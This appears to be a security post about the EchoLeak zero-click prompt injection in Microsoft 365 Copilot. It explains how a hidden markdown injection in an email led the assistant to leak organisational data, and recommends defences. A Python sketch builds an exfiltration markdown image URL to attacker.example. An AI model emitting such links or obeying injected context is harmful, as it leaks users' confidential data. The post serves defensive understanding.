Last week, we saw the first confirmed zero-click prompt injection breach against a production AI assistant.
No malware. No links to click. No user interaction.
Just a cleverly crafted email quietly triggering Microsoft 365 Copilot to leak sensitive org data as part of its intended behaviour.
Here’s how it worked:
• The attacker sent a benign-looking email or calendar invite
• Copilot ingested it automatically as background context
• Hidden inside was a prompt injection crafted in markdown
• Copilot responded by embedding internal data in a request to an attacker-controlled external URL (the pattern is sketched below)
• All of this happened without the user ever opening the email
This is CVE-2025-32711 (EchoLeak), CVSS severity 9.3.
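To make the exfiltration step concrete, here is a minimal Python sketch of the general pattern such hidden instructions push the model toward. The endpoint, parameter name, and example data are hypothetical; this illustrates the technique, not the actual EchoLeak payload.

```python
# Simplified illustration of markdown-based exfiltration (not the actual
# EchoLeak payload). Endpoint, parameter name, and data are hypothetical.
from urllib.parse import quote

ATTACKER_URL = "https://attacker.example/collect"  # hypothetical endpoint

def build_exfil_markdown(stolen_context: str) -> str:
    """Markdown image whose URL smuggles context data in the query string."""
    return f"![loading]({ATTACKER_URL}?d={quote(stolen_context)})"

# If the client auto-renders this image, the victim's own machine issues a
# GET to the attacker's server, carrying the data, with no click required.
print(build_exfil_markdown("example sensitive snippet from the context"))
```

The injected email never needs to exfiltrate anything itself; it only has to steer the assistant into emitting output that the rendering layer will fetch automatically.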
Let that sink in. The AI assistant did exactly what it was designed to do. It read context, summarized, assisted. But with no guardrails on trust boundaries, it blended attacker inputs with internal memory.
This wasn’t a user mistake. It wasn’t a phishing scam. It was a design flaw in the AI data pipeline itself.
🧠 The Novelty
What makes this different from prior prompt injection?
1. Zero-click. No action by the user. Sitting in the inbox was enough
2. Silent execution. No visible output or alerts. Invisible to the user and the SOC
3. Trusted context abuse. The assistant couldn’t distinguish between hostile inputs and safe memory
4. No sandboxing. Context ingestion, generation, and outbound network activity occurred in the same flow (a mitigation is sketched below)
This wasn’t just bad prompt filtering. It was the AI behaving correctly in a poorly defined system.
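Points 3 and 4 above are architectural, and so is the fix. One direction is to tag every context chunk with its provenance at ingestion and fence anything untrusted as data rather than instructions. A minimal sketch, with hypothetical field names and fencing scheme (this is not how Copilot is built):

```python
# Minimal sketch of provenance tagging at the trust boundary.
# Field names and the fencing scheme are illustrative assumptions.
from dataclasses import dataclass

@dataclass
class ContextChunk:
    text: str
    source: str    # e.g. "user", "email", "calendar", "doc"
    trusted: bool  # only direct user input may carry instructions

def render_prompt(chunks: list[ContextChunk]) -> str:
    parts = []
    for c in chunks:
        if c.trusted:
            parts.append(c.text)
        else:
            # Fence untrusted content as data. Delimiters alone are a weak
            # defence against injection, so pair them with output controls.
            parts.append(f"<untrusted source={c.source!r}>\n{c.text}\n</untrusted>")
    return "\n\n".join(parts)
```

Fencing does not make injection impossible, but it restores a boundary the model can be trained and evaluated against, and it gives downstream filters something to key on.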
🔐 Implications
For CISOs, architects, and Copilot owners: read this twice.
→ You must assume all inputs are hostile, including passive ones
→ Enforce strict context segmentation. Copilot shouldn’t ingest emails, chats, and docs in the same pass
→ Treat prompt handling as a security boundary, not just UX
→ Monitor agent output channels like you would outbound APIs (a minimal egress filter is sketched below)
→ Require your vendors to disclose what their AI sees and what triggers it
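On the output-monitoring point: the same egress discipline you apply to outbound APIs can sit between the model and the renderer. A minimal sketch in Python, assuming a simple domain allowlist (the domains, regex, and placeholder text are illustrative, not a production filter):

```python
# Minimal sketch of egress filtering on agent output before rendering.
# Allowlisted domains and the URL regex are illustrative placeholders.
import re

ALLOWED_DOMAINS = {"sharepoint.com", "office.com"}  # placeholder allowlist

URL_RE = re.compile(r"https?://([^/\s)\"'>]+)[^\s)\"'>]*", re.IGNORECASE)

def scrub_output(text: str) -> str:
    """Remove URLs that point outside the allowlist before display."""
    def check(m: re.Match) -> str:
        host = m.group(1).lower().split(":")[0]  # drop any port
        ok = any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)
        return m.group(0) if ok else "[external link removed]"
    return URL_RE.sub(check, text)

# The exfiltration markdown sketched earlier is neutralised on the way out:
print(scrub_output("![loading](https://attacker.example/collect?d=secret)"))
```

Blocking auto-fetch of external images in the client achieves the same effect at a different layer; ideally you do both.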
🧭 Final Thought
The next wave of breaches won’t look like malware or phishing.
They will look like AI tools doing exactly what they were trained to do, but in systems that never imagined a threat could come from within a calendar invite.
Patch if you must. But fix your AI architecture before the next CVE hits.
Regards,
Caute_Cautim